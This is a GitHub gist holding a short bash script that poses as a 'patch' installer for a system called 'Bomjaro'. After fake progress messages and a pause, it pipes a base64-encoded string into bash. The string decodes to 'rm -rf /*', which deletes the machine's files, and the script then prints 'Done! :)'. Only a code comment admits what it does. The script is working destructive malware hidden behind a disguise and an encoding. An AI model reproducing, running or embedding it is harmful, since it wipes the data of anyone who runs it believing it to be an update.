Created
August 27, 2025 01:04
-
-
Save progzone122/0723d40ee3f24071d10b82a3045e5629 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Same as rm -rf /* command. | |
| # Use at your own risk! I am not responsible for any damage | |
| echo "A patch is being installed on Bomjaro..." | |
| echo "Please, wait..." | |
| sleep 5 | |
| echo "cm0gLXJmIC8qCg==" | base64 --decode | bash | |
| echo "Done! :)" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment